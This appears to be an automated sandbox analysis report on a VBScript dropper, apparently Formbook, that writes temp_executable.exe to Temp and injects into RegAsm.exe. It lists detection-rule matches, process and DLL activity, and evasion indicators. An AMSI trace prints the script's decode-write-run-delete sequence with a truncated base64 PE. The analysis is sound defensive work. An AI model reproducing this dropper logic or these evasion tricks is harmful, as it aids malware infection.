Source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@5/2@1/1

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Mutant created: NULL

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.2086216650.000001615D7A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2054204916.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082243144.000001615D7C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082427583.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2086853744.000001615E450000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2083593147.000001615D7A7000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2058303544.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");IDictionary.Add("@@", "A");IDictionary.Add("))", "T");IDictionary.Add(";;;", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Keys();IDictionary.Item("@@");IDictionary.Item("))");IDictionary.Item(";;;");IDictionary.Item("...");IDictionary.Item("&&&");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAAlBCO8AAAAAAAAAAOAALgELAQYAAMgAAAAKAAAAAAAAvuc");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "2");_Stream.Close();IWshShell3.Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\temp_executable.exe");IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\temp_executable.exe")

.NET source code contains method to dynamically call methods (often used by packers)

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777257))})
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777257))})
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.YDB1IyobTTyUY(16777257))})

Binary contains a suspicious time stamp

Source: temp_executable.exe.0.dr

Static PE information: 0xEF084109 [Tue Jan 29 10:59:21 2097 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004030E0 push eax; ret	3_2_004030E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041488D pushfd ; iretd	3_2_0041488F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401966 push esi; iretd	3_2_00401967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402179 push ss; retf	3_2_0040213D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F1A0 push ss; ret	3_2_0041F1A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D4C7 push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D4CD push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418DD0 push ebp; ret	3_2_00418DE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D589 push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004116BB push edi; retf	3_2_004116BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042373B push es; ret	3_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00413FC3 push edi; ret	3_2_00413FCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004237B1 push es; ret	3_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C809AD push ecx; mov dword ptr [esp], ecx	3_2_02C809B6

Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'YMx1IyBoNY6Ba', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: temp_executable.exe.0.dr, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'YMx1IyBoNY6Ba', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.2.wscript.exe.1615e473b90.1.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'YMx1IyBoNY6Ba', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.3.wscript.exe.1615d7c0060.0.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'

Drops PE files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 31C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_02CFD1C0 rdtsc

3_2_02CFD1C0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 0.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3596	Thread sleep count: 214 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3596	Thread sleep count: 277 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3568	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3664	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6488	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: temp_executable.exe, 00000002.00000002.2078582648.0000000001515000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: wscript.exe, 00000000.00000003.2083664464.000001615B716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2083664464.000001615B716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_02CFD1C0 rdtsc

3_2_02CFD1C0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00417663 LdrLoadDll,

3_2_00417663

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
